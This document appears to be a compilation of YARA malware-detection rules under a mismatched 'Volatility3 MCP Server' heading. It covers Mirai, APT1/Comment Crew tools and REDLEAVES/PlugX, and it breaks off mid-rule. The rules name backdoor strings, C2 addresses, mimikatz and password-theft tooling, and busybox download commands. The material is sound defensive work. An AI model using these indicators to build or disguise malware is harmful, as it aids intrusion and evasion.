Volatility3 MCP Server

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Rules that are included in several other files. */ private rule is__elf { meta: author = "@mmorenog,@yararules" strings: $header = { 7F 45 4C 46 } condition: $header at 0 } rule is__Mirai_gen7 { meta: description = "Generic detection for MiraiX version 7" reference = "http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html" author = "unixfreaxjp" org = "MalwareMustDie" date = "2018-01-05" strings: $st01 = "/bin/busybox rm" fullword nocase wide ascii $st02 = "/bin/busybox echo" fullword nocase wide ascii $st03 = "/bin/busybox wget" fullword nocase wide ascii $st04 = "/bin/busybox tftp" fullword nocase wide ascii $st05 = "/bin/busybox cp" fullword nocase wide ascii $st06 = "/bin/busybox chmod" fullword nocase wide ascii $st07 = "/bin/busybox cat" fullword nocase wide ascii condition: 5 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule LIGHTDART_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "ret.log" wide ascii $s2 = "Microsoft Internet Explorer 6.0" wide ascii $s3 = "szURL Fail" wide ascii $s4 = "szURL Successfully" wide ascii $s5 = "%s&sdate=%04ld-%02ld-%02ld" wide ascii condition: all of them } rule AURIGA_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "superhard corp." wide ascii $s2 = "microsoft corp." wide ascii $s3 = "[Insert]" wide ascii $s4 = "[Delete]" wide ascii $s5 = "[End]" wide ascii $s6 = "!(*@)(!@KEY" wide ascii $s7 = "!(*@)(!@SID=" wide ascii condition: all of them } rule AURIGA_driver_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "Services\\riodrv32" wide ascii $s2 = "riodrv32.sys" wide ascii $s3 = "svchost.exe" wide ascii $s4 = "wuauserv.dll" wide ascii $s5 = "arp.exe" wide ascii $pdb = "projects\\auriga" wide ascii condition: all of ($s*) or $pdb } rule BANGAT_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "superhard corp." wide ascii $s2 = "microsoft corp." wide ascii $s3 = "[Insert]" wide ascii $s4 = "[Delete]" wide ascii $s5 = "[End]" wide ascii $s6 = "!(*@)(!@KEY" wide ascii $s7 = "!(*@)(!@SID=" wide ascii $s8 = "end binary output" wide ascii $s9 = "XriteProcessMemory" wide ascii $s10 = "IE:Password-Protected sites" wide ascii $s11 = "pstorec.dll" wide ascii condition: all of them } rule BISCUIT_GREENCAT_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "zxdosml" wide ascii $s2 = "get user name error!" wide ascii $s3 = "get computer name error!" wide ascii $s4 = "----client system info----" wide ascii $s5 = "stfile" wide ascii $s6 = "cmd success!" wide ascii condition: all of them } rule BOUNCER_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "*Qd9kdgba33*%Wkda0Qd3kvn$*&><(*&%$E#%$#1234asdgKNAg@!gy565dtfbasdg" wide ascii $s2 = "IDR_DATA%d" wide ascii $s3 = "asdfqwe123cxz" wide ascii $s4 = "Mode must be 0(encrypt) or 1(decrypt)." wide ascii condition: ($s1 and $s2) or ($s3 and $s4) } rule BOUNCER_DLL_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "new_connection_to_bounce():" wide ascii $s2 = "usage:%s IP port [proxip] [port] [key]" wide ascii condition: all of them } rule CALENDAR_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "content" wide ascii $s2 = "title" wide ascii $s3 = "entry" wide ascii $s4 = "feed" wide ascii $s5 = "DownRun success" wide ascii $s6 = "%s@gmail.com" wide ascii $s7 = "<!--%s-->" wide ascii $b8 = "W4qKihsb+So=" wide ascii $b9 = "PoqKigY7ggH+VcnqnTcmhFCo9w==" wide ascii $b10 = "8oqKiqb5880/uJLzAsY=" wide ascii condition: all of ($s*) or all of ($b*) } rule COMBOS_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "Mozilla4.0 (compatible; MSIE 7.0; Win32)" wide ascii $s2 = "Mozilla5.1 (compatible; MSIE 8.0; Win32)" wide ascii $s3 = "Delay" wide ascii $s4 = "Getfile" wide ascii $s5 = "Putfile" wide ascii $s6 = "---[ Virtual Shell]---" wide ascii $s7 = "Not Comming From Our Server %s." wide ascii condition: all of them } rule DAIRY_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "Mozilla/4.0 (compatible; MSIE 7.0;)" wide ascii $s2 = "KilFail" wide ascii $s3 = "KilSucc" wide ascii $s4 = "pkkill" wide ascii $s5 = "pklist" wide ascii condition: all of them } rule GLOOXMAIL_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "Kill process success!" wide ascii $s2 = "Kill process failed!" wide ascii $s3 = "Sleep success!" wide ascii $s4 = "based on gloox" wide ascii $pdb = "glooxtest.pdb" wide ascii condition: all of ($s*) or $pdb } rule GOGGLES_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "Kill process success!" wide ascii $s2 = "Kill process failed!" wide ascii $s3 = "Sleep success!" wide ascii $s4 = "based on gloox" wide ascii $pdb = "glooxtest.pdb" wide ascii condition: all of ($s*) or $pdb } rule HACKSFASE1_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = {cb 39 82 49 42 be 1f 3a} condition: all of them } rule HACKSFASE2_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "Send to Server failed." wide ascii $s2 = "HandShake with the server failed. Error:" wide ascii $s3 = "Decryption Failed. Context Expired." wide ascii condition: all of them } rule KURTON_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 5.1)" wide ascii $s2 = "!(*@)(!@PORT!(*@)(!@URL" wide ascii $s3 = "MyTmpFile.Dat" wide ascii $s4 = "SvcHost.DLL.log" wide ascii condition: all of them } rule LONGRUN_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0)" wide ascii $s2 = "%s\\%c%c%c%c%c%c%c" wide ascii $s3 = "wait:" wide ascii $s4 = "Dcryption Error! Invalid Character" wide ascii condition: all of them } rule MACROMAIL_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "svcMsn.dll" wide ascii $s2 = "RundllInstall" wide ascii $s3 = "Config service %s ok." wide ascii $s4 = "svchost.exe" wide ascii condition: all of them } rule MANITSME_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "Install an Service hosted by SVCHOST." wide ascii $s2 = "The Dll file that to be released." wide ascii $s3 = "SYSTEM\\CurrentControlSet\\Services\\" wide ascii $s4 = "svchost.exe" wide ascii $e1 = "Man,it's me" wide ascii $e2 = "Oh,shit" wide ascii $e3 = "Hallelujah" wide ascii $e4 = "nRet == SOCKET_ERROR" wide ascii $pdb1 = "rouji\\release\\Install.pdb" wide ascii $pdb2 = "rouji\\SvcMain.pdb" wide ascii condition: (all of ($s*)) or (all of ($e*)) or $pdb1 or $pdb2 } rule MINIASP_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "miniasp" wide ascii $s2 = "wakeup=" wide ascii $s3 = "download ok!" wide ascii $s4 = "command is null!" wide ascii $s5 = "device_input.asp?device_t=" wide ascii condition: all of them } rule NEWSREELS_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)" wide ascii $s2 = "name=%s&userid=%04d&other=%c%s" wide ascii $s3 = "download ok!" wide ascii $s4 = "command is null!" wide ascii $s5 = "noclient" wide ascii $s6 = "wait" wide ascii $s7 = "active" wide ascii $s8 = "hello" wide ascii condition: all of them } rule SEASALT_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMM" wide ascii $s2 = "upfileok" wide ascii $s3 = "download ok!" wide ascii $s4 = "upfileer" wide ascii $s5 = "fxftest" wide ascii condition: all of them } rule STARSYPOUND_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "*(SY)# cmd" wide ascii $s2 = "send = %d" wide ascii $s3 = "cmd.exe" wide ascii $s4 = "*(SY)#" wide ascii condition: all of them } rule SWORD_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>" wide ascii $s2 = "sleep:" wide ascii $s3 = "down:" wide ascii $s4 = "*========== Bye Bye ! ==========*" wide ascii condition: all of them } rule thequickbrow_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "thequickbrownfxjmpsvalzydg" wide ascii condition: all of them } rule TABMSGSQL_APT1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "letusgohtppmmv2.0.0.1" wide ascii $s2 = "Mozilla/4.0 (compatible; )" wide ascii $s3 = "filestoc" wide ascii $s4 = "filectos" wide ascii $s5 = "reshell" wide ascii condition: all of them } rule CCREWBACK1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $a = "postvalue" wide ascii $b = "postdata" wide ascii $c = "postfile" wide ascii $d = "hostname" wide ascii $e = "clientkey" wide ascii $f = "start Cmd Failure!" wide ascii $g = "sleep:" wide ascii $h = "downloadcopy:" wide ascii $i = "download:" wide ascii $j = "geturl:" wide ascii $k = "1.234.1.68" wide ascii condition: 4 of ($a,$b,$c,$d,$e) or $f or 3 of ($g,$h,$i,$j) or $k } rule TrojanCookies_CCREW { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $a = "sleep:" wide ascii $b = "content=" wide ascii $c = "reqpath=" wide ascii $d = "savepath=" wide ascii $e = "command=" wide ascii condition: 4 of ($a,$b,$c,$d,$e) } rule GEN_CCREW1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $a = "W!r@o#n$g" wide ascii $b = "KerNel32.dll" wide ascii condition: any of them } rule Elise { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $a = "SetElise.pdb" wide ascii condition: $a } rule EclipseSunCloudRAT { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $a = "Eclipse_A" wide ascii $b = "\\PJTS\\" wide ascii $c = "Eclipse_Client_B.pdb" wide ascii $d = "XiaoME" wide ascii $e = "SunCloud-Code" wide ascii $f = "/uc_server/data/forum.asp" wide ascii condition: any of them } rule MoonProject { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $a = "Serverfile is smaller than Clientfile" wide ascii $b = "\\M tools\\" wide ascii $c = "MoonDLL" wide ascii $d = "\\M tools\\" wide ascii condition: any of them } rule ccrewDownloader1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $a = {DD B5 61 F0 20 47 20 57 D6 65 9C CB 31 1B 65 42} condition: any of them } rule ccrewDownloader2 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $a = "3gZFQOBtY3sifNOl" wide ascii $b = "docbWUWsc2gRMv9HN7TFnvnKcrWUUFdAEem9DkqRALoD" wide ascii $c = "6QVSOZHQPCMc2A8HXdsfuNZcmUnIqWrOIjrjwOeagILnnScxadKEr1H2MZNwSnaJ" wide ascii condition: any of them } rule ccrewMiniasp { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $a = "MiniAsp.pdb" wide ascii $b = "device_t=" wide ascii condition: any of them } rule ccrewSSLBack2 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $a = {39 82 49 42 BE 1F 3A} condition: any of them } rule ccrewSSLBack3 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $a = "SLYHKAAY" wide ascii condition: any of them } rule ccrewSSLBack1 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $a = "!@#%$^#@!" wide ascii $b = "64.91.80.6" wide ascii condition: any of them } rule ccrewDownloader3 { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $a = "ejlcmbv" wide ascii $b = "bhxjuisv" wide ascii $c = "yqzgrh" wide ascii $d = "uqusofrp" wide ascii $e = "Ljpltmivvdcbb" wide ascii $f = "frfogjviirr" wide ascii $g = "ximhttoskop" wide ascii condition: 4 of them } rule ccrewQAZ { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $a = "!QAZ@WSX" wide ascii condition: $a } rule metaxcd { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $a = "<meta xcd=" wide ascii condition: $a } rule MiniASP { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $KEY = { 71 30 6E 63 39 77 38 65 64 61 6F 69 75 6B 32 6D 7A 72 66 79 33 78 74 31 70 35 6C 73 36 37 67 34 62 76 68 6A } $PDB = "MiniAsp.pdb" nocase wide ascii condition: any of them } rule DownloaderPossibleCCrew { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $a = "%s?%.6u" wide ascii $b = "szFileUrl=%s" wide ascii $c = "status=%u" wide ascii $d = "down file success" wide ascii $e = "Mozilla/4.0 (compatible; MSIE 6.0; Win32)" wide ascii condition: all of them } rule APT1_MAPIGET { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "%s\\Attachment.dat" wide ascii $s2 = "MyOutlook" wide ascii $s3 = "mail.txt" wide ascii $s4 = "Recv Time:" wide ascii $s5 = "Subject:" wide ascii condition: all of them } rule APT1_LIGHTBOLT { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $str1 = "bits.exe" wide ascii $str2 = "PDFBROW" wide ascii $str3 = "Browser.exe" wide ascii $str4 = "Protect!" wide ascii condition: 2 of them } rule APT1_GETMAIL { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $stra1 = "pls give the FULL path" wide ascii $stra2 = "mapi32.dll" wide ascii $stra3 = "doCompress" wide ascii $strb1 = "getmail.dll" wide ascii $strb2 = "doCompress" wide ascii $strb3 = "love" wide ascii condition: all of ($stra*) or all of ($strb*) } rule APT1_GDOCUPLOAD { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $str1 = "name=\"GALX\"" wide ascii $str2 = "User-Agent: Shockwave Flash" wide ascii $str3 = "add cookie failed..." wide ascii $str4 = ",speed=%f" wide ascii condition: 3 of them } rule APT1_WEBC2_Y21K { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $1 = "Y29ubmVjdA" wide ascii // connect $2 = "c2xlZXA" wide ascii // sleep $3 = "cXVpdA" wide ascii // quit $4 = "Y21k" wide ascii // cmd $5 = "dW5zdXBwb3J0" wide ascii // unsupport condition: 4 of them } rule APT1_WEBC2_YAHOO { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $http1 = "HTTP/1.0" wide ascii $http2 = "Content-Type:" wide ascii $uagent = "IPHONE8.5(host:%s,ip:%s)" wide ascii condition: all of them } rule APT1_WEBC2_UGX { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $persis = "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN" wide ascii $exe = "DefWatch.exe" wide ascii $html = "index1.html" wide ascii $cmd1 = "!@#tiuq#@!" wide ascii $cmd2 = "!@#dmc#@!" wide ascii $cmd3 = "!@#troppusnu#@!" wide ascii condition: 3 of them } rule APT1_WEBC2_TOCK { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $1 = "InprocServer32" wide ascii $2 = "HKEY_PERFORMANCE_DATA" wide ascii $3 = "<!---[<if IE 5>]id=" wide ascii condition: all of them } rule APT1_WEBC2_TABLE { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $msg1 = "Fail To Execute The Command" wide ascii $msg2 = "Execute The Command Successfully" wide ascii /* $gif1 = /\w+\.gif/ */ $gif2 = "GIF89" wide ascii condition: 3 of them } rule APT1_WEBC2_RAVE { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $1 = "iniet.exe" wide ascii $2 = "cmd.exe" wide ascii $3 = "SYSTEM\\CurrentControlSet\\Services\\DEVFS" wide ascii $4 = "Device File System" wide ascii condition: 3 of them } rule APT1_WEBC2_QBP { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $1 = "2010QBP" wide ascii $2 = "adobe_sl.exe" wide ascii $3 = "URLDownloadToCacheFile" wide ascii $4 = "dnsapi.dll" wide ascii $5 = "urlmon.dll" wide ascii condition: 4 of them } rule APT1_WEBC2_HEAD { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $1 = "Ready!" wide ascii $2 = "connect ok" wide ascii $3 = "WinHTTP 1.0" wide ascii $4 = "<head>" wide ascii condition: all of them } rule APT1_WEBC2_GREENCAT { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $1 = "reader_sl.exe" wide ascii $2 = "MS80547.bat" wide ascii $3 = "ADR32" wide ascii $4 = "ControlService failed!" wide ascii condition: 3 of them } rule APT1_WEBC2_DIV { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $1 = "3DC76854-C328-43D7-9E07-24BF894F8EF5" wide ascii $2 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide ascii $3 = "Hello from MFC!" wide ascii $4 = "Microsoft Internet Explorer" wide ascii condition: 3 of them } rule APT1_WEBC2_CSON { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $httpa1 = "/Default.aspx?INDEX=" wide ascii $httpa2 = "/Default.aspx?ID=" wide ascii $httpb1 = "Win32" wide ascii $httpb2 = "Accept: text*/*" wide ascii $exe1 = "xcmd.exe" wide ascii $exe2 = "Google.exe" wide ascii condition: 1 of ($exe*) and 1 of ($httpa*) and all of ($httpb*) } rule APT1_WEBC2_CLOVER { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $msg1 = "BUILD ERROR!" wide ascii $msg2 = "SUCCESS!" wide ascii $msg3 = "wild scan" wide ascii $msg4 = "Code too clever" wide ascii $msg5 = "insufficient lookahead" wide ascii $ua1 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; SV1)" wide ascii $ua2 = "Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.0.12) Firefox/1.5.0.12" wide ascii condition: 2 of ($msg*) and 1 of ($ua*) } rule APT1_WEBC2_BOLID { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $vm = "VMProtect" wide ascii $http = "http://[c2_location]/[page].html" wide ascii condition: all of them } rule APT1_WEBC2_ADSPACE { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $1 = "<!---HEADER ADSPACE style=" wide ascii $2 = "ERSVC.DLL" wide ascii condition: all of them } rule APT1_WEBC2_AUSOV { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $1 = "ntshrui.dll" wide ascii $2 = "%SystemRoot%\\System32\\" wide ascii $3 = "<!--DOCHTML" wide ascii $4 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" wide ascii $5 = "Ausov" wide ascii condition: 4 of them } rule APT1_WARP { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $err1 = "exception..." wide ascii $err2 = "failed..." wide ascii $err3 = "opened..." wide ascii $exe1 = "cmd.exe" wide ascii $exe2 = "ISUN32.EXE" wide ascii condition: 2 of ($err*) and all of ($exe*) } rule APT1_TARSIP_ECLIPSE { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $1 = "\\pipe\\ssnp" wide ascii $2 = "toobu.ini" wide ascii $3 = "Serverfile is not bigger than Clientfile" wide ascii $4 = "URL download success" wide ascii condition: 3 of them } rule APT1_TARSIP_MOON { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $s1 = "\\XiaoME\\SunCloud-Code\\moon" wide ascii $s2 = "URL download success!" wide ascii $s3 = "Kugoosoft" wide ascii $msg1 = "Modify file failed!! So strange!" wide ascii $msg2 = "Create cmd process failed!" wide ascii $msg3 = "The command has not been implemented!" wide ascii $msg4 = "Runas success!" wide ascii $onec1 = "onec.php" wide ascii $onec2 = "/bin/onec" wide ascii condition: 1 of ($s*) and 1 of ($msg*) and 1 of ($onec*) } /* rule APT1_payloads { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $pay1 = "rusinfo.exe" wide ascii $pay2 = "cmd.exe" wide ascii $pay3 = "AdobeUpdater.exe" wide ascii $pay4 = "buildout.exe" wide ascii $pay5 = "DefWatch.exe" wide ascii $pay6 = "d.exe" wide ascii $pay7 = "em.exe" wide ascii $pay8 = "IMSCMig.exe" wide ascii $pay9 = "localfile.exe" wide ascii $pay10 = "md.exe" wide ascii $pay11 = "mdm.exe" wide ascii $pay12 = "mimikatz.exe" wide ascii $pay13 = "msdev.exe" wide ascii $pay14 = "ntoskrnl.exe" wide ascii $pay15 = "p.exe" wide ascii $pay16 = "otepad.exe" wide ascii $pay17 = "reg.exe" wide ascii $pay18 = "regsvr.exe" wide ascii $pay19 = "runinfo.exe" wide ascii $pay20 = "AdobeUpdate.exe" wide ascii $pay21 = "inetinfo.exe" wide ascii $pay22 = "svehost.exe" wide ascii $pay23 = "update.exe" wide ascii $pay24 = "NTLMHash.exe" wide ascii $pay25 = "wpnpinst.exe" wide ascii $pay26 = "WSDbg.exe" wide ascii $pay27 = "xcmd.exe" wide ascii $pay28 = "adobeup.exe" wide ascii $pay29 = "0830.bin" wide ascii $pay30 = "1001.bin" wide ascii $pay31 = "a.bin" wide ascii $pay32 = "ISUN32.EXE" wide ascii $pay33 = "AcroRD32.EXE" wide ascii $pay34 = "INETINFO.EXE" wide ascii condition: 1 of them } */ rule APT1_RARSilent_EXE_PDF { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $winrar1 = "WINRAR.SFX" wide ascii $str2 = "Steup=" wide ascii condition: all of them } rule APT1_aspnetreport { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $url = "aspnet_client/report.asp" wide ascii $param = "name=%s&Gender=%c&Random=%04d&SessionKey=%s" wide ascii $pay1 = "rusinfo.exe" wide ascii $pay2 = "cmd.exe" wide ascii $pay3 = "AdobeUpdater.exe" wide ascii $pay4 = "buildout.exe" wide ascii $pay5 = "DefWatch.exe" wide ascii $pay6 = "d.exe" wide ascii $pay7 = "em.exe" wide ascii $pay8 = "IMSCMig.exe" wide ascii $pay9 = "localfile.exe" wide ascii $pay10 = "md.exe" wide ascii $pay11 = "mdm.exe" wide ascii $pay12 = "mimikatz.exe" wide ascii $pay13 = "msdev.exe" wide ascii $pay14 = "ntoskrnl.exe" wide ascii $pay15 = "p.exe" wide ascii $pay16 = "otepad.exe" wide ascii $pay17 = "reg.exe" wide ascii $pay18 = "regsvr.exe" wide ascii $pay19 = "runinfo.exe" wide ascii $pay20 = "AdobeUpdate.exe" wide ascii $pay21 = "inetinfo.exe" wide ascii $pay22 = "svehost.exe" wide ascii $pay23 = "update.exe" wide ascii $pay24 = "NTLMHash.exe" wide ascii $pay25 = "wpnpinst.exe" wide ascii $pay26 = "WSDbg.exe" wide ascii $pay27 = "xcmd.exe" wide ascii $pay28 = "adobeup.exe" wide ascii $pay29 = "0830.bin" wide ascii $pay30 = "1001.bin" wide ascii $pay31 = "a.bin" wide ascii $pay32 = "ISUN32.EXE" wide ascii $pay33 = "AcroRD32.EXE" wide ascii $pay34 = "INETINFO.EXE" wide ascii condition: $url and $param and 1 of ($pay*) } rule APT1_Revird_svc { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $dll1 = "nwwwks.dll" wide ascii $dll2 = "rdisk.dll" wide ascii $dll3 = "skeys.dll" wide ascii $dll4 = "SvcHost.DLL.log" wide ascii $svc1 = "InstallService" wide ascii $svc2 = "RundllInstallA" wide ascii $svc3 = "RundllUninstallA" wide ascii $svc4 = "ServiceMain" wide ascii $svc5 = "UninstallService" wide ascii condition: 1 of ($dll*) and 2 of ($svc*) } rule APT1_dbg_mess { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $dbg1 = "Down file ok!" wide ascii $dbg2 = "Send file ok!" wide ascii $dbg3 = "Command Error!" wide ascii $dbg4 = "Pls choose target first!" wide ascii $dbg5 = "Alert!" wide ascii $dbg6 = "Pls press enter to make sure!" wide ascii $dbg7 = "Are you sure to " wide ascii $pay1 = "rusinfo.exe" wide ascii $pay2 = "cmd.exe" wide ascii $pay3 = "AdobeUpdater.exe" wide ascii $pay4 = "buildout.exe" wide ascii $pay5 = "DefWatch.exe" wide ascii $pay6 = "d.exe" wide ascii $pay7 = "em.exe" wide ascii $pay8 = "IMSCMig.exe" wide ascii $pay9 = "localfile.exe" wide ascii $pay10 = "md.exe" wide ascii $pay11 = "mdm.exe" wide ascii $pay12 = "mimikatz.exe" wide ascii $pay13 = "msdev.exe" wide ascii $pay14 = "ntoskrnl.exe" wide ascii $pay15 = "p.exe" wide ascii $pay16 = "otepad.exe" wide ascii $pay17 = "reg.exe" wide ascii $pay18 = "regsvr.exe" wide ascii $pay19 = "runinfo.exe" wide ascii $pay20 = "AdobeUpdate.exe" wide ascii $pay21 = "inetinfo.exe" wide ascii $pay22 = "svehost.exe" wide ascii $pay23 = "update.exe" wide ascii $pay24 = "NTLMHash.exe" wide ascii $pay25 = "wpnpinst.exe" wide ascii $pay26 = "WSDbg.exe" wide ascii $pay27 = "xcmd.exe" wide ascii $pay28 = "adobeup.exe" wide ascii $pay29 = "0830.bin" wide ascii $pay30 = "1001.bin" wide ascii $pay31 = "a.bin" wide ascii $pay32 = "ISUN32.EXE" wide ascii $pay33 = "AcroRD32.EXE" wide ascii $pay34 = "INETINFO.EXE" wide ascii condition: 4 of ($dbg*) and 1 of ($pay*) } rule APT1_known_malicious_RARSilent { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $str1 = "Analysis And Outlook.doc" wide ascii $str2 = "North Korean launch.pdf" wide ascii $str3 = "Dollar General.doc" wide ascii $str4 = "Dow Corning Corp.pdf" wide ascii condition: 1 of them and APT1_RARSilent_EXE_PDF } /* US CERT Rule */ rule Dropper_DeploysMalwareViaSideLoading { meta: description = "Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX" author = "USG" true_positive = "5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx. " reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A" strings: $UniqueString = {2e 6c 6e 6b [0-14] 61 76 70 75 69 2e 65 78 65} // ".lnk" near "avpui.exe" $PsuedoRandomStringGenerator = {b9 1a [0-6] f7 f9 46 80 c2 41 88 54 35 8b 83 fe 64} // Unique function that generates a 100 character pseudo random string. condition: any of them } rule REDLEAVES_DroppedFile_ImplantLoader_Starburn { meta: description = "Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT" author = "USG" true_positive = "7f8a867a8302fe58039a6db254d335ae" // StarBurn.dll reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A" strings: $XOR_Loop = {32 0c 3a 83 c2 02 88 0e 83 fa 08 [4-14] 32 0c 3a 83 c2 02 88 0e 83 fa 10} // Deobfuscation loop condition: any of them } rule REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief { meta: description = "Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT" author = "USG" true_positive = "fb0c714cd2ebdcc6f33817abe7813c36" // handkerchief.dat reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A" strings: $RedleavesStringObfu = {73 64 65 5e 60 74 75 74 6c 6f 60 6d 5e 6d 64 60 77 64 72 5e 65 6d 6d 6c 60 68 6f 2f 65 6d 6d} // This is 'red_autumnal_leaves_dllmain.dll' XOR'd with 0x01 condition: any of them } rule REDLEAVES_CoreImplant_UniqueStrings { meta: description = "Strings identifying the core REDLEAVES RAT in its deobfuscated state" author = "USG" reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A" strings: $unique2 = "RedLeavesSCMDSimulatorMutex" nocase wide ascii $unique4 = "red_autumnal_leaves_dllmain.dll" wide ascii $unique7 = "\\NamePipe_MoreWindows" wide ascii condition: any of them } rule PLUGX_RedLeaves { meta: author = "US-CERT Code Analysis Team" date = "03042017" incident = "10118538" date = "2017/04/03" MD5_1 = "598FF82EA4FB52717ACAFB227C83D474" MD5_2 = "7D10708A518B26CC8C3CBFBAA224E032" MD5_3 = "AF406D35C77B1E0DF17F839E36BCE630" MD5_4 = "6EB9E889B091A5647F6095DCD4DE7C83" MD5_5 = "566291B277534B63EAFC938CDAAB8A399E41AF7D" info = "Detects specific RedLeaves and PlugX binaries" reference = 